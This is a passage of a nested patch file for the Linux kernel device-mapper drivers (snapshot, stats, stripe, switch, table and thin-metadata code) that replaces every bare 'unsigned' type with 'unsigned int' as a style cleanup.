+-	unsigned in_progress;
++	unsigned int in_progress;
+ 	struct wait_queue_head in_progress_wait;
+ 
+ 	struct dm_kcopyd_client *kcopyd_client;
+@@ -161,7 +161,7 @@ struct dm_snapshot {
+  */
+ #define DEFAULT_COW_THRESHOLD 2048
+ 
+-static unsigned cow_threshold = DEFAULT_COW_THRESHOLD;
++static unsigned int cow_threshold = DEFAULT_COW_THRESHOLD;
+ module_param_named(snapshot_cow_threshold, cow_threshold, uint, 0644);
+ MODULE_PARM_DESC(snapshot_cow_threshold, "Maximum number of chunks being copied on write");
+ 
+@@ -324,7 +324,7 @@ struct origin {
+ struct dm_origin {
+ 	struct dm_dev *dev;
+ 	struct dm_target *ti;
+-	unsigned split_boundary;
++	unsigned int split_boundary;
+ 	struct list_head hash_list;
+ };
+ 
+@@ -377,7 +377,7 @@ static void exit_origin_hash(void)
+ 	kfree(_dm_origins);
+ }
+ 
+-static unsigned origin_hash(struct block_device *bdev)
++static unsigned int origin_hash(struct block_device *bdev)
+ {
+ 	return bdev->bd_dev & ORIGIN_MASK;
+ }
+@@ -652,7 +652,7 @@ static void dm_exception_table_unlock(struct dm_exception_table_lock *lock)
+ }
+ 
+ static int dm_exception_table_init(struct dm_exception_table *et,
+-				   uint32_t size, unsigned hash_shift)
++				   uint32_t size, unsigned int hash_shift)
+ {
+ 	unsigned int i;
+ 
+@@ -850,7 +850,7 @@ static int dm_add_exception(void *context, chunk_t old, chunk_t new)
+ static uint32_t __minimum_chunk_size(struct origin *o)
+ {
+ 	struct dm_snapshot *snap;
+-	unsigned chunk_size = rounddown_pow_of_two(UINT_MAX);
++	unsigned int chunk_size = rounddown_pow_of_two(UINT_MAX);
+ 
+ 	if (o)
+ 		list_for_each_entry(snap, &o->snapshots, list)
+@@ -1010,7 +1010,7 @@ out:
+ }
+ 
+ static int origin_write_extent(struct dm_snapshot *merging_snap,
+-			       sector_t sector, unsigned chunk_size);
++			       sector_t sector, unsigned int chunk_size);
+ 
+ static void merge_callback(int read_err, unsigned long write_err,
+ 			   void *context);
+@@ -1183,7 +1183,7 @@ static int parse_snapshot_features(struct dm_arg_set *as, struct dm_snapshot *s,
+ 				   struct dm_target *ti)
+ {
+ 	int r;
+-	unsigned argc;
++	unsigned int argc;
+ 	const char *arg_name;
+ 
+ 	static const struct dm_arg _args[] = {
+@@ -1241,7 +1241,7 @@ static int snapshot_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ 	int r = -EINVAL;
+ 	char *origin_path, *cow_path;
+ 	dev_t origin_dev, cow_dev;
+-	unsigned args_used, num_flush_bios = 1;
++	unsigned int args_used, num_flush_bios = 1;
+ 	fmode_t origin_mode = FMODE_READ;
+ 
+ 	if (argc < 4) {
+@@ -2315,11 +2315,11 @@ static void snapshot_merge_resume(struct dm_target *ti)
+ }
+ 
+ static void snapshot_status(struct dm_target *ti, status_type_t type,
+-			    unsigned status_flags, char *result, unsigned maxlen)
++			    unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 	struct dm_snapshot *snap = ti->private;
+-	unsigned num_features;
++	unsigned int num_features;
+ 
+ 	switch (type) {
+ 	case STATUSTYPE_INFO:
+@@ -2592,7 +2592,7 @@ again:
+  * size must be a multiple of merging_snap's chunk_size.
+  */
+ static int origin_write_extent(struct dm_snapshot *merging_snap,
+-			       sector_t sector, unsigned size)
++			       sector_t sector, unsigned int size)
+ {
+ 	int must_wait = 0;
+ 	sector_t n;
+@@ -2668,7 +2668,7 @@ static void origin_dtr(struct dm_target *ti)
+ static int origin_map(struct dm_target *ti, struct bio *bio)
+ {
+ 	struct dm_origin *o = ti->private;
+-	unsigned available_sectors;
++	unsigned int available_sectors;
+ 
+ 	bio_set_dev(bio, o->dev->bdev);
+ 
+@@ -2679,7 +2679,7 @@ static int origin_map(struct dm_target *ti, struct bio *bio)
+ 		return DM_MAPIO_REMAPPED;
+ 
+ 	available_sectors = o->split_boundary -
+-		((unsigned)bio->bi_iter.bi_sector & (o->split_boundary - 1));
++		((unsigned int)bio->bi_iter.bi_sector & (o->split_boundary - 1));
+ 
+ 	if (bio_sectors(bio) > available_sectors)
+ 		dm_accept_partial_bio(bio, available_sectors);
+@@ -2713,7 +2713,7 @@ static void origin_postsuspend(struct dm_target *ti)
+ }
+ 
+ static void origin_status(struct dm_target *ti, status_type_t type,
+-			  unsigned status_flags, char *result, unsigned maxlen)
++			  unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct dm_origin *o = ti->private;
+ 
+diff --git a/drivers/md/dm-stats.c b/drivers/md/dm-stats.c
+index d12ba9bce145d..7eeb3c2a2492b 100644
+--- a/drivers/md/dm-stats.c
++++ b/drivers/md/dm-stats.c
+@@ -42,12 +42,12 @@ struct dm_stat_shared {
+ struct dm_stat {
+ 	struct list_head list_entry;
+ 	int id;
+-	unsigned stat_flags;
++	unsigned int stat_flags;
+ 	size_t n_entries;
+ 	sector_t start;
+ 	sector_t end;
+ 	sector_t step;
+-	unsigned n_histogram_entries;
++	unsigned int n_histogram_entries;
+ 	unsigned long long *histogram_boundaries;
+ 	const char *program_id;
+ 	const char *aux_data;
+@@ -63,7 +63,7 @@ struct dm_stat {
+ 
+ struct dm_stats_last_position {
+ 	sector_t last_sector;
+-	unsigned last_rw;
++	unsigned int last_rw;
+ };
+ 
+ /*
+@@ -255,8 +255,8 @@ static void dm_stats_recalc_precise_timestamps(struct dm_stats *stats)
+ }
+ 
+ static int dm_stats_create(struct dm_stats *stats, sector_t start, sector_t end,
+-			   sector_t step, unsigned stat_flags,
+-			   unsigned n_histogram_entries,
++			   sector_t step, unsigned int stat_flags,
++			   unsigned int n_histogram_entries,
+ 			   unsigned long long *histogram_boundaries,
+ 			   const char *program_id, const char *aux_data,
+ 			   void (*suspend_callback)(struct mapped_device *),
+@@ -475,11 +475,11 @@ do_sync_free:
+ }
+ 
+ static int dm_stats_list(struct dm_stats *stats, const char *program,
+-			 char *result, unsigned maxlen)
++			 char *result, unsigned int maxlen)
+ {
+ 	struct dm_stat *s;
+ 	sector_t len;
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 
+ 	/*
+ 	 * Output format:
+@@ -499,7 +499,7 @@ static int dm_stats_list(struct dm_stats *stats, const char *program,
+ 			if (s->stat_flags & STAT_PRECISE_TIMESTAMPS)
+ 				DMEMIT(" precise_timestamps");
+ 			if (s->n_histogram_entries) {
+-				unsigned i;
++				unsigned int i;
+ 				DMEMIT(" histogram:");
+ 				for (i = 0; i < s->n_histogram_entries; i++) {
+ 					if (i)
+@@ -523,7 +523,7 @@ static void dm_stat_round(struct dm_stat *s, struct dm_stat_shared *shared,
+ 	 * This is racy, but so is part_round_stats_single.
+ 	 */
+ 	unsigned long long now, difference;
+-	unsigned in_flight_read, in_flight_write;
++	unsigned int in_flight_read, in_flight_write;
+ 
+ 	if (likely(!(s->stat_flags & STAT_PRECISE_TIMESTAMPS)))
+ 		now = jiffies;
+@@ -534,8 +534,8 @@ static void dm_stat_round(struct dm_stat *s, struct dm_stat_shared *shared,
+ 	if (!difference)
+ 		return;
+ 
+-	in_flight_read = (unsigned)atomic_read(&shared->in_flight[READ]);
+-	in_flight_write = (unsigned)atomic_read(&shared->in_flight[WRITE]);
++	in_flight_read = (unsigned int)atomic_read(&shared->in_flight[READ]);
++	in_flight_write = (unsigned int)atomic_read(&shared->in_flight[WRITE]);
+ 	if (in_flight_read)
+ 		p->io_ticks[READ] += difference;
+ 	if (in_flight_write)
+@@ -596,9 +596,9 @@ static void dm_stat_for_entry(struct dm_stat *s, size_t entry,
+ 			duration = stats_aux->duration_ns;
+ 		}
+ 		if (s->n_histogram_entries) {
+-			unsigned lo = 0, hi = s->n_histogram_entries + 1;
++			unsigned int lo = 0, hi = s->n_histogram_entries + 1;
+ 			while (lo + 1 < hi) {
+-				unsigned mid = (lo + hi) / 2;
++				unsigned int mid = (lo + hi) / 2;
+ 				if (s->histogram_boundaries[mid - 1] > duration) {
+ 					hi = mid;
+ 				} else {
+@@ -656,7 +656,7 @@ static void __dm_stat_bio(struct dm_stat *s, int bi_rw,
+ }
+ 
+ void dm_stats_account_io(struct dm_stats *stats, unsigned long bi_rw,
+-			 sector_t bi_sector, unsigned bi_sectors, bool end,
++			 sector_t bi_sector, unsigned int bi_sectors, bool end,
+ 			 unsigned long start_time,
+ 			 struct dm_stats_aux *stats_aux)
+ {
+@@ -745,7 +745,7 @@ static void __dm_stat_init_temporary_percpu_totals(struct dm_stat_shared *shared
+ 		shared->tmp.io_ticks_total += READ_ONCE(p->io_ticks_total);
+ 		shared->tmp.time_in_queue += READ_ONCE(p->time_in_queue);
+ 		if (s->n_histogram_entries) {
+-			unsigned i;
++			unsigned int i;
+ 			for (i = 0; i < s->n_histogram_entries + 1; i++)
+ 				shared->tmp.histogram[i] += READ_ONCE(p->histogram[i]);
+ 		}
+@@ -779,7 +779,7 @@ static void __dm_stat_clear(struct dm_stat *s, size_t idx_start, size_t idx_end,
+ 		p->time_in_queue -= shared->tmp.time_in_queue;
+ 		local_irq_enable();
+ 		if (s->n_histogram_entries) {
+-			unsigned i;
++			unsigned int i;
+ 			for (i = 0; i < s->n_histogram_entries + 1; i++) {
+ 				local_irq_disable();
+ 				p = &s->stat_percpu[smp_processor_id()][x];
+@@ -816,7 +816,7 @@ static int dm_stats_clear(struct dm_stats *stats, int id)
+ static unsigned long long dm_jiffies_to_msec64(struct dm_stat *s, unsigned long long j)
+ {
+ 	unsigned long long result;
+-	unsigned mult;
++	unsigned int mult;
+ 
+ 	if (s->stat_flags & STAT_PRECISE_TIMESTAMPS)
+ 		return j;
+@@ -836,9 +836,9 @@ static unsigned long long dm_jiffies_to_msec64(struct dm_stat *s, unsigned long
+ 
+ static int dm_stats_print(struct dm_stats *stats, int id,
+ 			  size_t idx_start, size_t idx_len,
+-			  bool clear, char *result, unsigned maxlen)
++			  bool clear, char *result, unsigned int maxlen)
+ {
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 	struct dm_stat *s;
+ 	size_t x;
+ 	sector_t start, end, step;
+@@ -894,7 +894,7 @@ static int dm_stats_print(struct dm_stats *stats, int id,
+ 		       dm_jiffies_to_msec64(s, shared->tmp.io_ticks[READ]),
+ 		       dm_jiffies_to_msec64(s, shared->tmp.io_ticks[WRITE]));
+ 		if (s->n_histogram_entries) {
+-			unsigned i;
++			unsigned int i;
+ 			for (i = 0; i < s->n_histogram_entries + 1; i++) {
+ 				DMEMIT("%s%llu", !i ? " " : ":", shared->tmp.histogram[i]);
+ 			}
+@@ -943,11 +943,11 @@ static int dm_stats_set_aux(struct dm_stats *stats, int id, const char *aux_data
+ 	return 0;
+ }
+ 
+-static int parse_histogram(const char *h, unsigned *n_histogram_entries,
++static int parse_histogram(const char *h, unsigned int *n_histogram_entries,
+ 			   unsigned long long **histogram_boundaries)
+ {
+ 	const char *q;
+-	unsigned n;
++	unsigned int n;
+ 	unsigned long long last;
+ 
+ 	*n_histogram_entries = 1;
+@@ -982,23 +982,23 @@ static int parse_histogram(const char *h, unsigned *n_histogram_entries,
+ }
+ 
+ static int message_stats_create(struct mapped_device *md,
+-				unsigned argc, char **argv,
+-				char *result, unsigned maxlen)
++				unsigned int argc, char **argv,
++				char *result, unsigned int maxlen)
+ {
+ 	int r;
+ 	int id;
+ 	char dummy;
+ 	unsigned long long start, end, len, step;
+-	unsigned divisor;
++	unsigned int divisor;
+ 	const char *program_id, *aux_data;
+-	unsigned stat_flags = 0;
++	unsigned int stat_flags = 0;
+ 
+-	unsigned n_histogram_entries = 0;
++	unsigned int n_histogram_entries = 0;
+ 	unsigned long long *histogram_boundaries = NULL;
+ 
+ 	struct dm_arg_set as, as_backup;
+ 	const char *a;
+-	unsigned feature_args;
++	unsigned int feature_args;
+ 
+ 	/*
+ 	 * Input format:
+@@ -1107,7 +1107,7 @@ ret:
+ }
+ 
+ static int message_stats_delete(struct mapped_device *md,
+-				unsigned argc, char **argv)
++				unsigned int argc, char **argv)
+ {
+ 	int id;
+ 	char dummy;
+@@ -1122,7 +1122,7 @@ static int message_stats_delete(struct mapped_device *md,
+ }
+ 
+ static int message_stats_clear(struct mapped_device *md,
+-			       unsigned argc, char **argv)
++			       unsigned int argc, char **argv)
+ {
+ 	int id;
+ 	char dummy;
+@@ -1137,8 +1137,8 @@ static int message_stats_clear(struct mapped_device *md,
+ }
+ 
+ static int message_stats_list(struct mapped_device *md,
+-			      unsigned argc, char **argv,
+-			      char *result, unsigned maxlen)
++			      unsigned int argc, char **argv,
++			      char *result, unsigned int maxlen)
+ {
+ 	int r;
+ 	const char *program = NULL;
+@@ -1160,8 +1160,8 @@ static int message_stats_list(struct mapped_device *md,
+ }
+ 
+ static int message_stats_print(struct mapped_device *md,
+-			       unsigned argc, char **argv, bool clear,
+-			       char *result, unsigned maxlen)
++			       unsigned int argc, char **argv, bool clear,
++			       char *result, unsigned int maxlen)
+ {
+ 	int id;
+ 	char dummy;
+@@ -1187,7 +1187,7 @@ static int message_stats_print(struct mapped_device *md,
+ }
+ 
+ static int message_stats_set_aux(struct mapped_device *md,
+-				 unsigned argc, char **argv)
++				 unsigned int argc, char **argv)
+ {
+ 	int id;
+ 	char dummy;
+@@ -1201,8 +1201,8 @@ static int message_stats_set_aux(struct mapped_device *md,
+ 	return dm_stats_set_aux(dm_get_stats(md), id, argv[2]);
+ }
+ 
+-int dm_stats_message(struct mapped_device *md, unsigned argc, char **argv,
+-		     char *result, unsigned maxlen)
++int dm_stats_message(struct mapped_device *md, unsigned int argc, char **argv,
++		     char *result, unsigned int maxlen)
+ {
+ 	int r;
+ 
+diff --git a/drivers/md/dm-stats.h b/drivers/md/dm-stats.h
+index ee32b099f1cf7..c6728c8b41594 100644
+--- a/drivers/md/dm-stats.h
++++ b/drivers/md/dm-stats.h
+@@ -26,11 +26,11 @@ void dm_stats_cleanup(struct dm_stats *st);
+ 
+ struct mapped_device;
+ 
+-int dm_stats_message(struct mapped_device *md, unsigned argc, char **argv,
+-		     char *result, unsigned maxlen);
++int dm_stats_message(struct mapped_device *md, unsigned int argc, char **argv,
++		     char *result, unsigned int maxlen);
+ 
+ void dm_stats_account_io(struct dm_stats *stats, unsigned long bi_rw,
+-			 sector_t bi_sector, unsigned bi_sectors, bool end,
++			 sector_t bi_sector, unsigned int bi_sectors, bool end,
+ 			 unsigned long start_time,
+ 			 struct dm_stats_aux *aux);
+ 
+diff --git a/drivers/md/dm-stripe.c b/drivers/md/dm-stripe.c
+index baa085cc67bde..a81ed080730a7 100644
+--- a/drivers/md/dm-stripe.c
++++ b/drivers/md/dm-stripe.c
+@@ -273,7 +273,7 @@ static int stripe_map(struct dm_target *ti, struct bio *bio)
+ {
+ 	struct stripe_c *sc = ti->private;
+ 	uint32_t stripe;
+-	unsigned target_bio_nr;
++	unsigned int target_bio_nr;
+ 
+ 	if (bio->bi_opf & REQ_PREFLUSH) {
+ 		target_bio_nr = dm_bio_get_target_bio_nr(bio);
+@@ -359,7 +359,7 @@ static size_t stripe_dax_recovery_write(struct dm_target *ti, pgoff_t pgoff,
+  */
+ 
+ static void stripe_status(struct dm_target *ti, status_type_t type,
+-			  unsigned status_flags, char *result, unsigned maxlen)
++			  unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct stripe_c *sc = (struct stripe_c *) ti->private;
+ 	unsigned int sz = 0;
+@@ -406,7 +406,7 @@ static void stripe_status(struct dm_target *ti, status_type_t type,
+ static int stripe_end_io(struct dm_target *ti, struct bio *bio,
+ 		blk_status_t *error)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	char major_minor[16];
+ 	struct stripe_c *sc = ti->private;
+ 
+@@ -444,7 +444,7 @@ static int stripe_iterate_devices(struct dm_target *ti,
+ {
+ 	struct stripe_c *sc = ti->private;
+ 	int ret = 0;
+-	unsigned i = 0;
++	unsigned int i = 0;
+ 
+ 	do {
+ 		ret = fn(ti, sc->stripe[i].dev,
+@@ -459,7 +459,7 @@ static void stripe_io_hints(struct dm_target *ti,
+ 			    struct queue_limits *limits)
+ {
+ 	struct stripe_c *sc = ti->private;
+-	unsigned chunk_size = sc->chunk_size << SECTOR_SHIFT;
++	unsigned int chunk_size = sc->chunk_size << SECTOR_SHIFT;
+ 
+ 	blk_limits_io_min(limits, chunk_size);
+ 	blk_limits_io_opt(limits, chunk_size * sc->stripes);
+diff --git a/drivers/md/dm-switch.c b/drivers/md/dm-switch.c
+index 534dc2ca8bb06..f734b5a097443 100644
+--- a/drivers/md/dm-switch.c
++++ b/drivers/md/dm-switch.c
+@@ -38,9 +38,9 @@ struct switch_path {
+ struct switch_ctx {
+ 	struct dm_target *ti;
+ 
+-	unsigned nr_paths;		/* Number of paths in path_list. */
++	unsigned int nr_paths;		/* Number of paths in path_list. */
+ 
+-	unsigned region_size;		/* Region size in 512-byte sectors */
++	unsigned int region_size;		/* Region size in 512-byte sectors */
+ 	unsigned long nr_regions;	/* Number of regions making up the device */
+ 	signed char region_size_bits;	/* log2 of region_size or -1 */
+ 
+@@ -56,8 +56,8 @@ struct switch_ctx {
+ 	struct switch_path path_list[];
+ };
+ 
+-static struct switch_ctx *alloc_switch_ctx(struct dm_target *ti, unsigned nr_paths,
+-					   unsigned region_size)
++static struct switch_ctx *alloc_switch_ctx(struct dm_target *ti, unsigned int nr_paths,
++					   unsigned int region_size)
+ {
+ 	struct switch_ctx *sctx;
+ 
+@@ -73,7 +73,7 @@ static struct switch_ctx *alloc_switch_ctx(struct dm_target *ti, unsigned nr_pat
+ 	return sctx;
+ }
+ 
+-static int alloc_region_table(struct dm_target *ti, unsigned nr_paths)
++static int alloc_region_table(struct dm_target *ti, unsigned int nr_paths)
+ {
+ 	struct switch_ctx *sctx = ti->private;
+ 	sector_t nr_regions = ti->len;
+@@ -124,7 +124,7 @@ static int alloc_region_table(struct dm_target *ti, unsigned nr_paths)
+ }
+ 
+ static void switch_get_position(struct switch_ctx *sctx, unsigned long region_nr,
+-				unsigned long *region_index, unsigned *bit)
++				unsigned long *region_index, unsigned int *bit)
+ {
+ 	if (sctx->region_entries_per_slot_bits >= 0) {
+ 		*region_index = region_nr >> sctx->region_entries_per_slot_bits;
+@@ -137,10 +137,10 @@ static void switch_get_position(struct switch_ctx *sctx, unsigned long region_nr
+ 	*bit *= sctx->region_table_entry_bits;
+ }
+ 
+-static unsigned switch_region_table_read(struct switch_ctx *sctx, unsigned long region_nr)
++static unsigned int switch_region_table_read(struct switch_ctx *sctx, unsigned long region_nr)
+ {
+ 	unsigned long region_index;
+-	unsigned bit;
++	unsigned int bit;
+ 
+ 	switch_get_position(sctx, region_nr, &region_index, &bit);
+ 
+@@ -151,9 +151,9 @@ static unsigned switch_region_table_read(struct switch_ctx *sctx, unsigned long
+ /*
+  * Find which path to use at given offset.
+  */
+-static unsigned switch_get_path_nr(struct switch_ctx *sctx, sector_t offset)
++static unsigned int switch_get_path_nr(struct switch_ctx *sctx, sector_t offset)
+ {
+-	unsigned path_nr;
++	unsigned int path_nr;
+ 	sector_t p;
+ 
+ 	p = offset;
+@@ -172,10 +172,10 @@ static unsigned switch_get_path_nr(struct switch_ctx *sctx, sector_t offset)
+ }
+ 
+ static void switch_region_table_write(struct switch_ctx *sctx, unsigned long region_nr,
+-				      unsigned value)
++				      unsigned int value)
+ {
+ 	unsigned long region_index;
+-	unsigned bit;
++	unsigned int bit;
+ 	region_table_slot_t pte;
+ 
+ 	switch_get_position(sctx, region_nr, &region_index, &bit);
+@@ -191,7 +191,7 @@ static void switch_region_table_write(struct switch_ctx *sctx, unsigned long reg
+  */
+ static void initialise_region_table(struct switch_ctx *sctx)
+ {
+-	unsigned path_nr = 0;
++	unsigned int path_nr = 0;
+ 	unsigned long region_nr;
+ 
+ 	for (region_nr = 0; region_nr < sctx->nr_regions; region_nr++) {
+@@ -249,7 +249,7 @@ static void switch_dtr(struct dm_target *ti)
+  * Optional args are to allow for future extension: currently this
+  * parameter must be 0.
+  */
+-static int switch_ctr(struct dm_target *ti, unsigned argc, char **argv)
++static int switch_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ {
+ 	static const struct dm_arg _args[] = {
+ 		{1, (KMALLOC_MAX_SIZE - sizeof(struct switch_ctx)) / sizeof(struct switch_path), "Invalid number of paths"},
+@@ -259,7 +259,7 @@ static int switch_ctr(struct dm_target *ti, unsigned argc, char **argv)
+ 
+ 	struct switch_ctx *sctx;
+ 	struct dm_arg_set as;
+-	unsigned nr_paths, region_size, nr_optional_args;
++	unsigned int nr_paths, region_size, nr_optional_args;
+ 	int r;
+ 
+ 	as.argc = argc;
+@@ -320,7 +320,7 @@ static int switch_map(struct dm_target *ti, struct bio *bio)
+ {
+ 	struct switch_ctx *sctx = ti->private;
+ 	sector_t offset = dm_target_offset(ti, bio->bi_iter.bi_sector);
+-	unsigned path_nr = switch_get_path_nr(sctx, offset);
++	unsigned int path_nr = switch_get_path_nr(sctx, offset);
+ 
+ 	bio_set_dev(bio, sctx->path_list[path_nr].dmdev->bdev);
+ 	bio->bi_iter.bi_sector = sctx->path_list[path_nr].start + offset;
+@@ -371,9 +371,9 @@ static __always_inline unsigned long parse_hex(const char **string)
+ }
+ 
+ static int process_set_region_mappings(struct switch_ctx *sctx,
+-				       unsigned argc, char **argv)
++				       unsigned int argc, char **argv)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	unsigned long region_index = 0;
+ 
+ 	for (i = 1; i < argc; i++) {
+@@ -466,8 +466,8 @@ static int process_set_region_mappings(struct switch_ctx *sctx,
+  *
+  * Only set_region_mappings is supported.
+  */
+-static int switch_message(struct dm_target *ti, unsigned argc, char **argv,
+-			  char *result, unsigned maxlen)
++static int switch_message(struct dm_target *ti, unsigned int argc, char **argv,
++			  char *result, unsigned int maxlen)
+ {
+ 	static DEFINE_MUTEX(message_mutex);
+ 
+@@ -487,10 +487,10 @@ static int switch_message(struct dm_target *ti, unsigned argc, char **argv,
+ }
+ 
+ static void switch_status(struct dm_target *ti, status_type_t type,
+-			  unsigned status_flags, char *result, unsigned maxlen)
++			  unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct switch_ctx *sctx = ti->private;
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 	int path_nr;
+ 
+ 	switch (type) {
+@@ -519,7 +519,7 @@ static void switch_status(struct dm_target *ti, status_type_t type,
+ static int switch_prepare_ioctl(struct dm_target *ti, struct block_device **bdev)
+ {
+ 	struct switch_ctx *sctx = ti->private;
+-	unsigned path_nr;
++	unsigned int path_nr;
+ 
+ 	path_nr = switch_get_path_nr(sctx, 0);
+ 
+diff --git a/drivers/md/dm-table.c b/drivers/md/dm-table.c
+index 8541d5688f3a6..c571f2385b57f 100644
+--- a/drivers/md/dm-table.c
++++ b/drivers/md/dm-table.c
+@@ -126,7 +126,7 @@ static int alloc_targets(struct dm_table *t, unsigned int num)
+ }
+ 
+ int dm_table_create(struct dm_table **result, fmode_t mode,
+-		    unsigned num_targets, struct mapped_device *md)
++		    unsigned int num_targets, struct mapped_device *md)
+ {
+ 	struct dm_table *t = kzalloc(sizeof(*t), GFP_KERNEL);
+ 
+@@ -470,10 +470,10 @@ static int adjoin(struct dm_table *t, struct dm_target *ti)
+  * On the other hand, dm-switch needs to process bulk data using messages and
+  * excessive use of GFP_NOIO could cause trouble.
+  */
+-static char **realloc_argv(unsigned *size, char **old_argv)
++static char **realloc_argv(unsigned int *size, char **old_argv)
+ {
+ 	char **argv;
+-	unsigned new_size;
++	unsigned int new_size;
+ 	gfp_t gfp;
+ 
+ 	if (*size) {
+@@ -499,7 +499,7 @@ static char **realloc_argv(unsigned *size, char **old_argv)
+ int dm_split_args(int *argc, char ***argvp, char *input)
+ {
+ 	char *start, *end = input, *out, **argv = NULL;
+-	unsigned array_size = 0;
++	unsigned int array_size = 0;
+ 
+ 	*argc = 0;
+ 
+@@ -732,9 +732,8 @@ int dm_table_add_target(struct dm_table *t, const char *type,
+ /*
+  * Target argument parsing helpers.
+  */
+-static int validate_next_arg(const struct dm_arg *arg,
+-			     struct dm_arg_set *arg_set,
+-			     unsigned *value, char **error, unsigned grouped)
++static int validate_next_arg(const struct dm_arg *arg, struct dm_arg_set *arg_set,
++			     unsigned int *value, char **error, unsigned int grouped)
+ {
+ 	const char *arg_str = dm_shift_arg(arg_set);
+ 	char dummy;
+@@ -752,14 +751,14 @@ static int validate_next_arg(const struct dm_arg *arg,
+ }
+ 
+ int dm_read_arg(const struct dm_arg *arg, struct dm_arg_set *arg_set,
+-		unsigned *value, char **error)
++		unsigned int *value, char **error)
+ {
+ 	return validate_next_arg(arg, arg_set, value, error, 0);
+ }
+ EXPORT_SYMBOL(dm_read_arg);
+ 
+ int dm_read_arg_group(const struct dm_arg *arg, struct dm_arg_set *arg_set,
+-		      unsigned *value, char **error)
++		      unsigned int *value, char **error)
+ {
+ 	return validate_next_arg(arg, arg_set, value, error, 1);
+ }
+@@ -780,7 +779,7 @@ const char *dm_shift_arg(struct dm_arg_set *as)
+ }
+ EXPORT_SYMBOL(dm_shift_arg);
+ 
+-void dm_consume_args(struct dm_arg_set *as, unsigned num_args)
++void dm_consume_args(struct dm_arg_set *as, unsigned int num_args)
+ {
+ 	BUG_ON(as->argc < num_args);
+ 	as->argc -= num_args;
+@@ -856,7 +855,7 @@ static int device_is_rq_stackable(struct dm_target *ti, struct dm_dev *dev,
+ 
+ static int dm_table_determine_type(struct dm_table *t)
+ {
+-	unsigned bio_based = 0, request_based = 0, hybrid = 0;
++	unsigned int bio_based = 0, request_based = 0, hybrid = 0;
+ 	struct dm_target *ti;
+ 	struct list_head *devices = dm_table_get_devices(t);
+ 	enum dm_queue_mode live_md_type = dm_get_md_type(t->md);
+@@ -1535,7 +1534,7 @@ static bool dm_table_any_dev_attr(struct dm_table *t,
+ static int count_device(struct dm_target *ti, struct dm_dev *dev,
+ 			sector_t start, sector_t len, void *data)
+ {
+-	unsigned *num_devices = data;
++	unsigned int *num_devices = data;
+ 
+ 	(*num_devices)++;
+ 
+@@ -1565,7 +1564,7 @@ bool dm_table_has_no_data_devices(struct dm_table *t)
+ {
+ 	for (unsigned int i = 0; i < t->num_targets; i++) {
+ 		struct dm_target *ti = dm_table_get_target(t, i);
+-		unsigned num_devices = 0;
++		unsigned int num_devices = 0;
+ 
+ 		if (!ti->type->iterate_devices)
+ 			return false;
+diff --git a/drivers/md/dm-thin-metadata.c b/drivers/md/dm-thin-metadata.c
+index 6bcc4c4786d89..80545ec541210 100644
+--- a/drivers/md/dm-thin-metadata.c
++++ b/drivers/md/dm-thin-metadata.c
+@@ -318,12 +318,12 @@ static void unpack_block_time(uint64_t v, dm_block_t *b, uint32_t *t)
+  */
+ typedef int (*run_fn)(struct dm_space_map *, dm_block_t, dm_block_t);
+ 
+-static void with_runs(struct dm_space_map *sm, const __le64 *value_le, unsigned count, run_fn fn)
++static void with_runs(struct dm_space_map *sm, const __le64 *value_le, unsigned int count, run_fn fn)
+ {
+ 	uint64_t b, begin, end;
+ 	uint32_t t;
+ 	bool in_run = false;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < count; i++, value_le++) {
+ 		/* We know value_le is 8 byte aligned */
+@@ -348,13 +348,13 @@ static void with_runs(struct dm_space_map *sm, const __le64 *value_le, unsigned
+ 		fn(sm, begin, end);
+ }
+ 
+-static void data_block_inc(void *context, const void *value_le, unsigned count)
++static void data_block_inc(void *context, const void *value_le, unsigned int count)
+ {
+ 	with_runs((struct dm_space_map *) context,
+ 		  (const __le64 *) value_le, count, dm_sm_inc_blocks);
+ }
+ 
+-static void data_block_dec(void *context, const void *value_le, unsigned count)
++static void data_block_dec(void *context, const void *value_le, unsigned int count)
+ {
+ 	with_runs((struct dm_space_map *) context,
+ 		  (const __le64 *) value_le, count, dm_sm_dec_blocks);
+@@ -374,21 +374,21 @@ static int data_block_equal(void *context, const void *value1_le, const void *va
+ 	return b1 == b2;
+ }
+ 
+-static void subtree_inc(void *context, const void *value, unsigned count)
++static void subtree_inc(void *context, const void *value, unsigned int count)
+ {
+ 	struct dm_btree_info *info = context;
+ 	const __le64 *root_le = value;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < count; i++, root_le++)
+ 		dm_tm_inc(info->tm, le64_to_cpu(*root_le));
+ }
+ 
+-static void subtree_dec(void *context, const void *value, unsigned count)
++static void subtree_dec(void *context, const void *value, unsigned int count)
+ {
+ 	struct dm_btree_info *info = context;
+ 	const __le64 *root_le = value;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < count; i++, root_le++)
+ 		if (dm_btree_del(info, le64_to_cpu(*root_le)))
+@@ -448,10 +448,10 @@ static int superblock_lock(struct dm_pool_metadata *pmd,
+ static int __superblock_all_zeroes(struct dm_block_manager *bm, int *result)
+ {
+ 	int r;
+-	unsigned i;
++	unsigned int i;
+ 	struct dm_block *b;
+ 	__le64 *data_le, zero = cpu_to_le64(0);
+-	unsigned block_size = dm_bm_block_size(bm) / sizeof(__le64);
++	unsigned int block_size = dm_bm_block_size(bm) / sizeof(__le64);
+ 
+ 	/*
+ 	 * We can't use a validator here - it may be all zeroes.
+@@ -971,7 +971,7 @@ struct dm_pool_metadata *dm_pool_metadata_open(struct block_device *bdev,
+ int dm_pool_metadata_close(struct dm_pool_metadata *pmd)
+ {
+ 	int r;
+-	unsigned open_devices = 0;
++	unsigned int open_devices = 0;
+ 	struct dm_thin_device *td, *tmp;
+ 
+ 	down_read(&pmd->root_lock);
+@@ -1679,7 +1679,7 @@ int dm_thin_insert_block(struct dm_thin_device *td, dm_block_t block,
+ static int __remove_range(struct dm_thin_device *td, dm_block_t begin, dm_block_t end)
+ {
+ 	int r;
